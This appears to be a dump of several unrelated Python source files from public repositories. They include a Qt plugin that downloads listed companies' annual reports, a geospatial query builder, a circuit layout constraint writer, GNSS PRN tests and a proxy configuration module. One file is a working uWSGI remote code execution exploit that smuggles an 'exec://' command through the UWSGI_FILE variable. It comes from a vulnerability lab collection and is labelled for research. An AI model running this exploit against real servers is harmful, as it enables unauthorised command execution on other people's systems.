file_name = AnnouncementDownloader.format_download_path(page)
if '*' in file_name:
file_name = file_name.replace('*', '')
time.sleep(random.random() * 5)
r = requests.get(download)
f = open(file_name, "wb")
f.write(r.content)
f.close()
@staticmethod
def format_download_path(page) -> str:
file_name = page['secName'] + '_' + page['announcementTitle'] + '.pdf'
file_path = path.join(root_path, 'Download', 'report', page['secCode'])
makedirs(file_path, exist_ok=True)
return path.join(file_path, file_name)
@staticmethod
def check_filter_allowed(text: str, include_filter: [str] or None, exclude_filter: [str] or None) -> bool:
allowed = False
if include_filter is not None and len(include_filter) > 0:
for inc in include_filter:
if inc in text:
allowed = True
break
else:
allowed = True
if exclude_filter is not None and len(exclude_filter) > 0:
for exc in exclude_filter:
if exc in text:
allowed = False
break
return allowed
# ----------------------------------------- Interface -----------------------------------------
@staticmethod
def download_annual_report(stock_identity: str or list, time_range: any = None, quit_flag: [bool] = None):
if not isinstance(stock_identity, (list, tuple)):
stock_identity = [stock_identity]
for identity in stock_identity:
s, f = AnnouncementDownloader.__detect_stock_code_and_page_entry(identity)
AnnouncementDownloader.__download_report_for_securities(s, f, time_range, quit_flag)
@staticmethod
def __detect_stock_code_and_page_entry(stock_identity: str) -> tuple:
if stock_identity.endswith('.SSE'):
s = stock_identity[: -4]
f = AnnouncementDownloader.get_sse_annual_report_pages
elif stock_identity.endswith('.SZSE'):
s = stock_identity[: -5]
f = AnnouncementDownloader.get_szse_annual_report_pages
else:
s = stock_identity
exchange = get_stock_exchange(stock_identity)
if exchange == 'SSE':
f = AnnouncementDownloader.get_sse_annual_report_pages
elif exchange == 'SZSE':
f = AnnouncementDownloader.get_szse_annual_report_pages
else:
f = AnnouncementDownloader.get_sse_annual_report_pages
return s, f
@staticmethod
def __download_report_for_securities(s, f, time_range, quit_flag):
page = 1
while page < 1000: # Max limit
if quit_flag is not None and quit_flag[0]:
break
try:
print('Downloading report for %s, page %s' % (s, page))
page_data = f(page, s, time_range)
if len(page_data) == 0:
break
AnnouncementDownloader.execute_download(page_data,
include_filter=['年年度报告'],
exclude_filter=['确认意见', '摘要', '已取消'],
quit_flag=quit_flag)
if len(page_data) != 30:
break
except Exception as e:
print(e)
print('Maybe page reaches end.')
break
finally:
page += 1
# ----------------------------------------------------------------------------------------------------------------------
ALL_STOCK_TEXT = '所有'
DEFAULT_INFO = '''
本扩展程序功能:从巨朝网下载上市公司公开报告
1.下载代码来自:https://github.com/gaodechen/cninfo_process
2.如果选择“自定义”,请自行设置关键字以根据报告标题进行过滤
3.默认下载路径为当前目录下Download/report/
4.下载任务会占用系统工作队列,和数据更新功能共享资源
- 请在“View->任务管理”中管理下载任务
- 在前一个任务没完成时,也可以添加下一个任务
5.如果选择时间范围过大或股票过多,可能会被网站BAN,切勿贪多
'''
DOWNLOAD_ALL_TIPS = '''
接下来的操作会为所有股票下载年报
这会花费很长的时间以及占用很大的磁盘空间
********并存在被网站BAN的可能性********
如非特别需要,建议选择个别股票分别下载
-------------是否继续此操作-------------
'''
# ----------------------------------- UpdateTask -----------------------------------
class AnnouncementDownloadTask(TaskQueue.Task):
REPORT_TYPE_NONE = 0
REPORT_TYPE_ANNUAL = 1
def __init__(self):
super(AnnouncementDownloadTask, self).__init__('AnnouncementDownloadTask')
self.__quit_flag = [False]
# Modules
self.sas_if: sasIF = None
self.task_manager: TaskQueue = None
# self.data_utility = None
# Parameters
self.securities = ''
self.period_since = None
self.period_until = None
self.filter_include = []
self.filter_exclude = []
self.report_type = AnnouncementDownloadTask.REPORT_TYPE_ANNUAL
def run(self):
try:
self.__execute_update()
except Exception as e:
print(e)
print('Continue...')
finally:
print('Finished')
def quit(self):
self.__quit_flag[0] = True
def identity(self) -> str:
return 'Download Report: ' + self.securities
def __execute_update(self):
if self.securities == ALL_STOCK_TEXT:
stock_list = self.sas_if.sas_get_stock_info_list()
for stock_identity, stock_name in stock_list:
if self.__quit_flag is not None and self.__quit_flag[0]:
break
# self.__build_sub_update(stock_identity)
AnnouncementDownloader.download_annual_report(stock_identity, (self.period_since, self.period_until),
self.__quit_flag)
elif self.report_type == AnnouncementDownloadTask.REPORT_TYPE_ANNUAL:
AnnouncementDownloader.download_annual_report(self.securities, (self.period_since, self.period_until),
self.__quit_flag)
else:
pass
# def __build_sub_update(self, securities: str):
# task = AnnouncementDownloadTask()
# task.securities = securities
# task.period_since = self.period_since
# task.period_until = self.period_until
# task.filter_include = self.filter_include
# task.filter_exclude = self.filter_exclude
# task.report_type = self.report_type
# task.task_manager = self.task_manager
# self.task_manager.append_task(task)
# ----------------------------- AnnouncementDownloaderUi -----------------------------
class AnnouncementDownloaderUi(QWidget):
def __init__(self, sas_if: sasIF, task_manager):
super(AnnouncementDownloaderUi, self).__init__()
# ---------------- ext var ----------------
self.__sas_if = sas_if
# self.__data_center = self.__data_hub.get_data_center() if self.__data_hub is not None else None
# self.__data_utility = self.__data_hub.get_data_utility() if self.__data_hub is not None else None
self.__task_manager = task_manager
self.__translate = QtCore.QCoreApplication.translate
# Timer for update stock list
self.__timer = QTimer()
self.__timer.setInterval(1000)
self.__timer.timeout.connect(self.on_timer)
self.__timer.start()
# Ui component
self.__combo_name = SecuritiesSelector(self.__sas_if, self)
self.__radio_annual_report = QRadioButton('年报')
self.__radio_customize_filter = QRadioButton('自定义')
self.__line_filter_include = QLineEdit()
self.__line_filter_exclude = QLineEdit()
self.__button_download = QPushButton('确定')
self.__datetime_since = QDateTimeEdit(QDateTime.currentDateTime().addYears(-3))
self.__datetime_until = QDateTimeEdit(QDateTime.currentDateTime())
self.init_ui()
# ---------------------------------------------------- UI Init -----------------------------------------------------
def init_ui(self):
self.__layout_control()
self.__config_control()
def __layout_control(self):
main_layout = QVBoxLayout()
self.setLayout(main_layout)
main_layout.addLayout(horizon_layout([QLabel('股票代码'), self.__combo_name], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告起始'), self.__datetime_since], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告截止'), self.__datetime_until], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('报告类型'), self.__radio_annual_report,
self.__radio_customize_filter], [1, 5, 5]))
main_layout.addLayout(horizon_layout([QLabel('包含词条(以,分隔)'), self.__line_filter_include], [1, 10]))
main_layout.addLayout(horizon_layout([QLabel('排除词条(以,分隔)'), self.__line_filter_exclude], [1, 10]))
main_layout.addWidget(QLabel(DEFAULT_INFO))
main_layout.addWidget(self.__button_download)
def __config_control(self):
# self.__combo_name.setEditable(True)
# self.__combo_name.addItem('所有')
# self.__combo_name.addItem('股票列表载入中')
self.__radio_annual_report.setChecked(True)
self.__line_filter_include.setEnabled(False)
self.__line_filter_exclude.setEnabled(False)
self.__radio_customize_filter.setEnabled(False)
self.__radio_annual_report.clicked.connect(self.on_radio_report_type)
self.__radio_customize_filter.clicked.connect(self.on_radio_report_type)
self.__button_download.clicked.connect(self.on_button_download)
def on_timer(self):
if self.__combo_name.count() > 1:
self.__combo_name.insertItem(0, ALL_STOCK_TEXT)
self.__combo_name.setCurrentIndex(0)
self.__timer.stop()
# # Check stock list ready and update combobox
# if self.__data_utility is not None:
# if self.__data_utility.stock_cache_ready():
# self.__combo_name.clear()
# self.__combo_name.addItem(ALL_STOCK_TEXT)
# stock_list = self.__data_utility.get_stock_list()
# for stock_identity, stock_name in stock_list:
# self.__combo_name.addItem(stock_identity + ' | ' + stock_name, stock_identity)
def on_radio_report_type(self):
if self.__radio_annual_report.isChecked():
self.__line_filter_include.setEnabled(False)
self.__line_filter_exclude.setEnabled(False)
else:
self.__line_filter_include.setEnabled(True)
self.__line_filter_exclude.setEnabled(True)
def on_button_download(self):
# input_securities = self.__combo_name.currentText()
# if '|' in input_securities:
# input_securities = input_securities.split('|')[0].strip()
input_securities = self.__combo_name.get_input_securities()
if input_securities == ALL_STOCK_TEXT:
if self.__sas_if is None:
QMessageBox.information(self,
QtCore.QCoreApplication.translate('main', '提示'),
QtCore.QCoreApplication.translate('main', '无法获取股票列表'),
QMessageBox.Yes, QMessageBox.No)
return
reply = QMessageBox.question(self,
QtCore.QCoreApplication.translate('main', '操作确认'),
QtCore.QCoreApplication.translate('main', DOWNLOAD_ALL_TIPS),
QMessageBox.Yes | QMessageBox.No,
QMessageBox.No)
if reply != QMessageBox.Yes:
return
self.__build_download_task(input_securities)
def __build_download_task(self, securities: str):
task = AnnouncementDownloadTask()
task.securities = securities
task.period_since = self.__datetime_since.dateTime().toPyDateTime()
task.period_until = self.__datetime_until.dateTime().toPyDateTime()
task.filter_include = self.__line_filter_include.text().split(',')
task.filter_exclude = self.__line_filter_exclude.text().split(',')
task.report_type = \
AnnouncementDownloadTask.REPORT_TYPE_ANNUAL \
if self.__radio_annual_report.isChecked() else \
AnnouncementDownloadTask.REPORT_TYPE_NONE
task.task_manager = self.__task_manager
task.sas_if = self.__sas_if
# task.data_utility = self.__data_utility
if self.__task_manager is not None:
self.__task_manager.append_task(task)
else:
task.run()
# ----------------------------------------------------------------------------------------------------------------------
def plugin_prob() -> dict:
return {
'plugin_id': 'efa60977-65e9-4ecf-9271-7c6e629da399',
'plugin_name': 'ReportDownloader',
'plugin_version': '0.0.0.1',
'tags': ['Announcement', 'Report', 'Finance Report', 'Annual Report', 'Sleepy'],
}
def plugin_adapt(method: str) -> bool:
return method in ['widget']
def plugin_capacities() -> list:
return ['widget']
# ----------------------------------------------------------------------------------------------------------------------
sasInterface = None
def init(sas_if) -> bool:
try:
global sasInterface
sasInterface = sas_if
except Exception as e:
pass
finally:
pass
return True
def widget(parent: QWidget, **kwargs) -> (QWidget, dict):
ui_context: UiContext = kwargs.get('ui_context', None)
task_manager = None if ui_context is None else ui_context.get_task_queue()
return AnnouncementDownloaderUi(sasInterface, task_manager), \
{'name': '年报下载', 'show': False}
# ----------------------------------------------------------------------------------------------------------------------
def main():
app = QApplication(sys.argv)
dlg = WrapperQDialog(AnnouncementDownloaderUi(None, None))
dlg.exec()
# ----------------------------------------------------------------------------------------------------------------------
def exception_hook(type, value, tback):
# log the exception here
print('Exception hook triggered.')
print(type)
print(value)
print(tback)
# then call the default handler
sys.__excepthook__(type, value, tback)
if __name__ == "__main__":
sys.excepthook = exception_hook
try:
main()
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
exit()
finally:
pass
|
python/src/main/python/pygw/query/aggregation_query_builder.py | radiant-maxar/geowave | 280 | 21900 | <reponame>radiant-maxar/geowave
#
# Copyright (c) 2013-2020 Contributors to the Eclipse Foundation
#
# See the NOTICE file distributed with this work for additional information regarding copyright
# ownership. All rights reserved. This program and the accompanying materials are made available
# under the terms of the Apache License, Version 2.0 which accompanies this distribution and is
# available at http://www.apache.org/licenses/LICENSE-2.0.txt
# ===============================================================================================
from .base_query_builder import BaseQueryBuilder
from .aggregation_query import AggregationQuery
from ..base.type_conversions import StringArrayType
class AggregationQueryBuilder(BaseQueryBuilder):
"""
A builder for creating aggregation queries. This class should not be used directly. Instead, use one of the derived
classes such as `pygw.query.vector.VectorAggregationQueryBuilder`.
"""
def __init__(self, java_ref):
super().__init__(java_ref)
def count(self, *type_names):
"""
This is a convenience method to set the count aggregation if no type names are given it is
assumed to count every type.
Args:
type_names (str): The type names to count results.
Returns:
This query builder.
"""
if type_names is None:
self._java_ref.count()
else:
self._java_ref.count(StringArrayType().to_java(type_names))
return self
def aggregate(self, type_name, j_aggregation):
"""
Provide the Java Aggregation function and the type name to apply the aggregation on.
Args:
type_name (str): The type name to aggregate.
j_aggregation (Aggregation): The Java aggregation function to
Returns:
This query builder.
"""
return self._java_ref.aggregate(type_name, j_aggregation)
def build(self):
"""
Builds the configured aggregation query.
Returns:
The final constructed `pygw.query.AggregationQuery`.
"""
return AggregationQuery(self._java_ref.build(), self._java_transformer)
|
uwsgi/unacc/poc.py | nobgr/vulhub | 9,681 | 21902 | #!/usr/bin/python
# coding: utf-8
######################
# Uwsgi RCE Exploit
######################
# Author: <EMAIL>
# Created: 2017-7-18
# Last modified: 2018-1-30
# Note: Just for research purpose
import sys
import socket
import argparse
import requests
def sz(x):
s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
s = bytes.fromhex(s) if sys.version_info[0] == 3 else s.decode('hex')
return s[::-1]
def pack_uwsgi_vars(var):
pk = b''
for k, v in var.items() if hasattr(var, 'items') else var:
pk += sz(k) + k.encode('utf8') + sz(v) + v.encode('utf8')
result = b'\x00' + sz(pk) + b'\x00' + pk
return result
def parse_addr(addr, default_port=None):
port = default_port
if isinstance(addr, str):
if addr.isdigit():
addr, port = '', addr
elif ':' in addr:
addr, _, port = addr.partition(':')
elif isinstance(addr, (list, tuple, set)):
addr, port = addr
port = int(port) if port else port
return (addr or '127.0.0.1', port)
def get_host_from_url(url):
if '//' in url:
url = url.split('//', 1)[1]
host, _, url = url.partition('/')
return (host, '/' + url)
def fetch_data(uri, payload=None, body=None):
if 'http' not in uri:
uri = 'http://' + uri
s = requests.Session()
# s.headers['UWSGI_FILE'] = payload
if body:
import urlparse
body_d = dict(urlparse.parse_qsl(urlparse.urlsplit(body).path))
d = s.post(uri, data=body_d)
else:
d = s.get(uri)
return {
'code': d.status_code,
'text': d.text,
'header': d.headers
}
def ask_uwsgi(addr_and_port, mode, var, body=''):
if mode == 'tcp':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(parse_addr(addr_and_port))
elif mode == 'unix':
s = socket.socket(socket.AF_UNIX)
s.connect(addr_and_port)
s.send(pack_uwsgi_vars(var) + body.encode('utf8'))
response = []
# Actually we dont need the response, it will block if we run any commands.
# So I comment all the receiving stuff.
# while 1:
# data = s.recv(4096)
# if not data:
# break
# response.append(data)
s.close()
return b''.join(response).decode('utf8')
def curl(mode, addr_and_port, payload, target_url):
host, uri = get_host_from_url(target_url)
path, _, qs = uri.partition('?')
if mode == 'http':
return fetch_data(addr_and_port+uri, payload)
elif mode == 'tcp':
host = host or parse_addr(addr_and_port)[0]
else:
host = addr_and_port
var = {
'SERVER_PROTOCOL': 'HTTP/1.1',
'REQUEST_METHOD': 'GET',
'PATH_INFO': path,
'REQUEST_URI': uri,
'QUERY_STRING': qs,
'SERVER_NAME': host,
'HTTP_HOST': host,
'UWSGI_FILE': payload,
'SCRIPT_NAME': target_url
}
return ask_uwsgi(addr_and_port, mode, var)
def main(*args):
desc = """
This is a uwsgi client & RCE exploit.
Last modifid at 2018-01-30 by <EMAIL>
"""
elog = "Example:uwsgi_exp.py -u 192.168.3.11:5000 -c \"echo 111>/tmp/abc\""
parser = argparse.ArgumentParser(description=desc, epilog=elog)
parser.add_argument('-m', '--mode', nargs='?', default='tcp',
help='Uwsgi mode: 1. http 2. tcp 3. unix. The default is tcp.',
dest='mode', choices=['http', 'tcp', 'unix'])
parser.add_argument('-u', '--uwsgi', nargs='?', required=True,
help='Uwsgi server: 192.168.3.11:5000 or /tmp/uwsgi.sock',
dest='uwsgi_addr')
parser.add_argument('-c', '--command', nargs='?', required=True,
help='Command: The exploit command you want to execute, must have this.',
dest='command')
if len(sys.argv) < 2:
parser.print_help()
return
args = parser.parse_args()
if args.mode.lower() == "http":
print("[-]Currently only tcp/unix method is supported in RCE exploit.")
return
payload = 'exec://' + args.command + "; echo test" # must have someting in output or the uWSGI crashs.
print("[*]Sending payload.")
print(curl(args.mode.lower(), args.uwsgi_addr, payload, '/testapp'))
if __name__ == '__main__':
main() |
align/pnr/write_constraint.py | ALIGN-analoglayout/ALIGN-public | 119 | 21925 | <gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 13 14:50:24 2021
@author: kunal001
"""
import pathlib
import pprint
import json
import logging
from ..schema import constraint
logger = logging.getLogger(__name__)
pp = pprint.PrettyPrinter(indent=4)
class PnRConstraintWriter:
def __init__(self):
pass
def map_valid_const(self,all_const):
"""
Maps input format to pnr format
"""
logger.debug(f"input constraints {all_const}")
#Start mapping
pnr_const=[]
for input_const in constraint.expand_user_constraints(all_const):
# Create dict for PnR constraint
# and handle common field aliasing
const = input_const.dict(
exclude = {'constraint'},
exclude_unset=True)
const['const_name'] = input_const.__class__.__name__
if 'instances' in const:
const['blocks'] = const['instances']
del const['instances']
# Add dict to PnR constraint list
if not const['const_name'] in ('NetConst', 'PortLocation', 'MultiConnection'):
pnr_const.append(const)
# Constraint-specific field transformations
if const["const_name"] == 'Order':
const["const_name"] = 'Ordering'
if const["direction"] in ("left_to_right", "horizontal"):
const["direction"] = 'H'
elif const["direction"] in ("top_to_bottom", "vertical"):
const["direction"] = 'V'
else:
raise NotImplementedError(f'PnR does not support direction {const["direction"]} yet')
elif const["const_name"] == 'SameTemplate':
logger.info( f'found a SameTemplate: {const}')
elif const["const_name"] == 'MatchBlocks':
const["const_name"] = 'MatchBlock'
const['block1'] = const['blocks'][0]
const['block2'] = const['blocks'][1]
del const['blocks']
elif const["const_name"] == 'BlockDistance':
const["const_name"] = 'bias_graph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'HorizontalDistance':
const["const_name"] = 'bias_Hgraph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'VerticalDistance':
const["const_name"] = 'bias_Vgraph'
const["distance"] = const.pop('abs_distance')
elif const["const_name"] == 'AspectRatio':
const["const_name"] = 'Aspect_Ratio'
del const['subcircuit']
elif const["const_name"] == 'Boundary':
del const['subcircuit']
for key in ['max_width', 'max_height']:
if const[key] is None:
del const[key]
elif const["const_name"] == 'SymmetricBlocks':
const["const_name"] = 'SymmBlock'
const["axis_dir"] = const.pop("direction")
pairs = []
for blocks in const["pairs"]:
if len(blocks)==1:
temp = {
"type": "selfsym",
"block": blocks[0]
}
elif len(blocks)==2:
temp = {
"type":"sympair",
"block1":blocks[0],
"block2":blocks[1]
}
else:
logger.warning(f"invalid group for symmetry {blocks}")
pairs.append(temp)
const["pairs"] = pairs
elif const["const_name"] == 'GroupCaps':
const["const_name"] = 'CC'
const["cap_name"] = const.pop("name").upper()
const["unit_capacitor"] = const.pop("unit_cap").upper()
const["size"] = const.pop("num_units")
const["nodummy"] = not const["dummy"]
const["cap_r"] = -1
const["cap_s"] = -1
del const["dummy"]
del const["blocks"]
elif const["const_name"] == 'Align':
const["const_name"] = 'AlignBlock'
if const['line'] not in ['h_bottom', 'h_top', 'v_right', 'v_left', 'v_center']:
raise NotImplementedError(f'PnR does not support edge {const["line"]} yet')
elif const["const_name"] == 'SymmetricNets':
const["const_name"] = 'SymmNet'
const["axis_dir"] = const.pop("direction")
if "pins1" in const and "pins2" in const:
pins1 = self._map_pins(const["pins1"])
pins2 = self._map_pins(const["pins2"])
del const["pins1"]
del const["pins2"]
else:
pins1 = [{"type": "dummy", "name": "dummy", "pin": None}]
pins2 = [{"type": "dummy", "name": "dummy", "pin": None}]
const['net1'] = {
"name": const['net1'],
"blocks": pins1}
const['net2'] = {
"name": const['net2'],
"blocks": pins2}
elif const["const_name"] == 'PortLocation':
for port in const["ports"]:
extra = {
"const_name" : 'PortLocation',
"location" : const["location"],
"terminal_name" : port
}
pnr_const.append(extra)
elif const["const_name"] == 'MultiConnection':
for net in const["nets"]:
extra = {
"const_name": 'Multi_Connection',
"multi_number": int(const["multiplier"]),
"net_name": net.upper() # TODO: Revert after case sensitivity is restored
}
pnr_const.append(extra)
elif const["const_name"] == 'NetConst':
for net in const["nets"]:
if 'shield' in const and 'criticality' in const and not const['shield'] == "None":
extra = {
"const_name" : 'ShieldNet',
"net_name" : net,
"shield_net" : const["shield"]
}
pnr_const.append(extra)
extra = {
"const_name" : 'CritNet',
"net_name" : net,
"priority" : const["criticality"]
}
pnr_const.append(extra)
elif 'shield' in const and not const['shield'] =="None":
extra = {
"const_name" : 'ShieldNet',
"net_name" : net,
"shield_net" : const["shield"]
}
pnr_const.append(extra)
elif 'criticality' in const and const['shield'] =="None":
extra = {
"const_name" : 'CritNet',
"net_name" : net,
"priority" : const["criticality"]
}
pnr_const.append(extra)
logger.debug(f"Const mapped to PnR const format {pnr_const}")
return {'constraints': pnr_const}
def _map_pins(self,pins:list):
blocks=[]
for pin in pins:
if '/' in pin:
temp = {
"type":"pin",
"name":pin.split('/')[0],
"pin":pin.split('/')[1]
}
else:
temp = {
"type":"terminal",
"name":pin,
"pin":None
}
blocks.append(temp)
return blocks
|
tests/test_prns.py | mfkiwl/laika-gnss | 365 | 21933 | <gh_stars>100-1000
import unittest
from laika.helpers import get_constellation, get_prn_from_nmea_id, \
get_nmea_id_from_prn, NMEA_ID_RANGES
SBAS_DATA = [
['S01', 33],
['S02', 34],
['S10', 42],
['S22', 54],
['S23', 55],
['S32', 64],
['S33', 120],
['S64', 151],
['S65', 152],
['S71', 158]
]
MAIN_CONSTELLATIONS = [
['G01', 1],
['G10', 10],
['G32', 32],
['R01', 65],
['R10', 74],
['R23', 87],
['R24', 88],
['R25', 89],
['R32', 96],
['E01', 301],
['E02', 302],
['E36', 336],
['C01', 201],
['C02', 202],
['C29', 229],
['J01', 193],
['J04', 196]
]
class TestConstellationPRN(unittest.TestCase):
def test_constellation_from_valid_prn(self):
data = [
['G01', 'GPS'],
['G10', 'GPS'],
['G32', 'GPS'],
['R01', 'GLONASS'],
['R10', 'GLONASS'],
['R23', 'GLONASS'],
['R24', 'GLONASS'],
['R25', 'GLONASS'],
['R32', 'GLONASS'],
['E01', 'GALILEO'],
['E02', 'GALILEO'],
['E36', 'GALILEO'],
['C01', 'BEIDOU'],
['C02', 'BEIDOU'],
['C29', 'BEIDOU'],
['J01', 'QZNSS'],
['J04', 'QZNSS'],
['S01', 'SBAS'],
['I01', 'IRNSS']
]
for prn, expected_constellation in data:
constellation = get_constellation(prn)
self.assertEqual(constellation, expected_constellation)
def test_constellation_from_prn_with_invalid_identifier(self):
prn = '?01'
self.assertWarns(UserWarning, get_constellation, prn)
self.assertIsNone(get_constellation(prn))
def test_constellation_from_prn_outside_range(self):
prn = 'G99'
constellation = get_constellation(prn)
self.assertEqual(constellation, 'GPS')
def test_prn_from_nmea_id_for_main_constellations(self):
data = MAIN_CONSTELLATIONS
for expected_prn, nmea_id in data:
prn = get_prn_from_nmea_id(nmea_id)
self.assertEqual(prn, expected_prn)
def test_prn_from_nmea_id_for_SBAS(self):
'''Probably numbering SBAS as single constellation doesn't make
sense, but programmatically it works the same as for others
constellations.'''
data = SBAS_DATA
for expected_prn, nmea_id in data:
prn = get_prn_from_nmea_id(nmea_id)
self.assertEqual(prn, expected_prn)
def test_prn_from_invalid_nmea_id(self):
data = [
(-1, "?-1"),
(0, "?0"),
(100, "?100"),
(160, "?160"),
(190, "?190"),
(300, "?300")
]
for nmea_id, expected_prn in data:
self.assertWarns(UserWarning, get_prn_from_nmea_id, nmea_id)
self.assertEqual(get_prn_from_nmea_id(nmea_id), expected_prn)
self.assertRaises(TypeError, get_prn_from_nmea_id, None)
self.assertRaises(TypeError, get_prn_from_nmea_id, '1')
def test_nmea_id_from_prn_for_main_constellations(self):
data = MAIN_CONSTELLATIONS
for prn, expected_nmea_id in data:
nmea_id = get_nmea_id_from_prn(prn)
self.assertEqual(nmea_id, expected_nmea_id)
def test_nmea_id_from_prn_for_SBAS(self):
'''Probably numbering SBAS as single constellation doesn't make
sense, but programmatically it works the same as for others
constellations.'''
data = SBAS_DATA
for prn, expected_nmea_id in data:
nmea_id = get_nmea_id_from_prn(prn)
self.assertEqual(nmea_id, expected_nmea_id)
def test_nmea_id_from_invalid_prn(self):
# Special unknown constellation - valid number
self.assertEqual(1, get_nmea_id_from_prn('?01'))
self.assertEqual(-1, get_nmea_id_from_prn('?-1'))
# Special unknown constellation - invalid number
self.assertRaises(ValueError, get_nmea_id_from_prn, '???')
# Constellation with unknwown identifier
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'X01')
# Valid constellation - invalid number
self.assertRaises(ValueError, get_nmea_id_from_prn, 'G00')
self.assertRaises(ValueError, get_nmea_id_from_prn, 'GAA')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'G33')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'C99')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'R99')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'J99')
# None
self.assertRaises(TypeError, get_nmea_id_from_prn, None)
def test_nmea_ranges_are_valid(self):
last_end = 0
for entry in NMEA_ID_RANGES:
self.assertIn('range', entry)
self.assertIn('constellation', entry)
range_ = entry['range']
self.assertEqual(len(range_), 2)
start, end = range_
self.assertLessEqual(start, end)
self.assertLess(last_end, start)
last_end = end
|
lib/exaproxy/configuration.py | oriolarcas/exaproxy | 124 | 21955 | <gh_stars>100-1000
# encoding: utf-8
"""
configuration.py
Created by <NAME> on 2011-11-29.
Copyright (c) 2011-2013 Exa Networks. All rights reserved.
"""
# NOTE: reloading mid-program not possible
import os
import sys
import logging
import pwd
import math
import socket
import struct
_application = None
_config = None
_defaults = None
class ConfigurationError (Exception):
pass
_syslog_name_value = {
'CRITICAL' : logging.CRITICAL,
'ERROR' : logging.ERROR,
'WARNING' : logging.WARNING,
'INFO' : logging.INFO,
'DEBUG' : logging.DEBUG,
}
_syslog_value_name = {
logging.CRITICAL : 'CRITICAL',
logging.ERROR : 'ERROR',
logging.WARNING : 'WARNING',
logging.INFO : 'INFO',
logging.DEBUG : 'DEBUG',
}
class NoneDict (dict):
def __getitem__ (self,name):
return None
nonedict = NoneDict()
home = os.path.normpath(sys.argv[0]) if sys.argv[0].startswith('/') else os.path.normpath(os.path.join(os.getcwd(),sys.argv[0]))
class value (object):
@staticmethod
def nop (_):
return _
@staticmethod
def syslog (log):
if log not in _syslog_name_value:
raise TypeError('invalid log level %s' % log)
return _syslog_name_value[log]
@staticmethod
def root (path):
roots = home.split(os.sep)
location = []
for index in range(len(roots)-1,-1,-1):
if roots[index] in ('lib','bin'):
if index:
location = roots[:index]
break
root = os.path.join(*location)
paths = [
os.path.normpath(os.path.join(os.path.join(os.sep,root,path))),
os.path.normpath(os.path.expanduser(value.unquote(path))),
os.path.normpath(os.path.join('/',path)),
os.path.normpath(os.path.join('/','usr',path)),
]
return paths
@staticmethod
def integer (_):
value = int(_)
if value <= 0:
raise TypeError('the value must be positive')
return value
@staticmethod
def lowunquote (_):
return _.strip().strip('\'"').lower()
@staticmethod
def unquote (_):
return _.strip().strip('\'"')
@staticmethod
def boolean (_):
return _.lower() in ('1','yes','on','enable','true')
@staticmethod
def list (_):
return _.split()
@staticmethod
def ports (_):
try:
return [int(x) for x in _.split()]
except ValueError:
raise TypeError('resolv.conf can not be found (are you using DHCP without any network setup ?)')
@staticmethod
def methods (_):
return _.upper().split()
@staticmethod
def user (_):
try:
pwd.getpwnam(_)
# uid = answer[2]
except KeyError:
raise TypeError('user %s is not found on this system' % _)
return _
@staticmethod
def folder(path):
paths = value.root(path)
options = [path for path in paths if os.path.exists(path)]
if not options: raise TypeError('%s does not exists' % path)
first = options[0]
if not first: raise TypeError('%s does not exists' % first)
return first
@staticmethod
def conf(path):
first = value.folder(path)
if not os.path.isfile(first): raise TypeError('%s is not a file' % path)
return first
@staticmethod
def resolver(path):
global _application
paths = value.root('etc/%s/dns/resolv.conf' % _application)
paths.append(os.path.normpath(os.path.join('/','etc','resolv.conf')))
paths.append(os.path.normpath(os.path.join('/','var','run','resolv.conf')))
for resolver in paths:
if os.path.exists(resolver):
with open(resolver) as r:
if 'nameserver' in (line.strip().split(None,1)[0].lower() for line in r.readlines() if line.strip()):
return resolver
raise TypeError('resolv.conf can not be found (are you using DHCP without any network setup ?)')
@staticmethod
def exe (path):
argv = path.split(' ',1)
program = value.conf(argv.pop(0))
if not os.access(program, os.X_OK):
raise TypeError('%s is not an executable' % program)
return program if not argv else '%s %s' % (program,argv[0])
@staticmethod
def services (string):
try:
services = []
for service in value.unquote(string).split():
host,port = service.split(':')
services.append((host,int(port)))
return services
except ValueError:
raise TypeError('resolv.conf can not be found (are you using DHCP without any network setup ?)')
@staticmethod
def ranges (string):
try:
ranges = []
for service in value.unquote(string).split():
network,netmask = service.split('/')
if ':' in network:
high,low = struct.unpack('!QQ',socket.inet_pton(socket.AF_INET6,network))
start = (high << 64) + low
end = start + pow(2,128-int(netmask)) - 1
ranges.append((6,start,end))
else:
start = struct.unpack('!L',socket.inet_pton(socket.AF_INET,network))[0]
end = start + pow(2,32-int(netmask)) - 1
ranges.append((4,start,end))
return ranges
except ValueError:
raise TypeError('Can not parse the data as IP range')
@staticmethod
def redirector (name):
if name == 'url' or name.startswith('icap://'):
return name
raise TypeError('invalid redirector protocol %s, options are url or header' % name)
class string (object):
@staticmethod
def nop (_):
return _
@staticmethod
def syslog (log):
if log not in _syslog_value_name:
raise TypeError('invalid log level %s' % log)
return _syslog_value_name[log]
@staticmethod
def quote (_):
return "'%s'" % str(_)
@staticmethod
def lower (_):
return str(_).lower()
@staticmethod
def path (path):
split = sys.argv[0].split('lib/%s' % _application)
if len(split) > 1:
prefix = os.sep.join(split[:1])
if prefix and path.startswith(prefix):
path = path[len(prefix):]
home = os.path.expanduser('~')
if path.startswith(home):
return "'~%s'" % path[len(home):]
return "'%s'" % path
@staticmethod
def list (_):
return "'%s'" % ' '.join((str(x) for x in _))
@staticmethod
def services (_):
l = ' '.join(('%s:%d' % (host,port) for host,port in _))
return "'%s'" % l
@staticmethod
def ranges (_):
def convert ():
for (proto,start,end) in _:
bits = int(math.log(end-start+1,2))
if proto == 4:
network = socket.inet_ntop(socket.AF_INET,struct.pack('!L',start))
yield '%s/%d' % (network,32-bits)
else:
high = struct.pack('!Q',start >> 64)
low = struct.pack('!Q',start & 0xFFFFFFFF)
network = socket.inet_ntop(socket.AF_INET6,high+low)
yield '%s/%d' % (network,128-bits)
return "'%s'" % ' '.join(convert())
import ConfigParser
class Store (dict):
def __getitem__ (self,key):
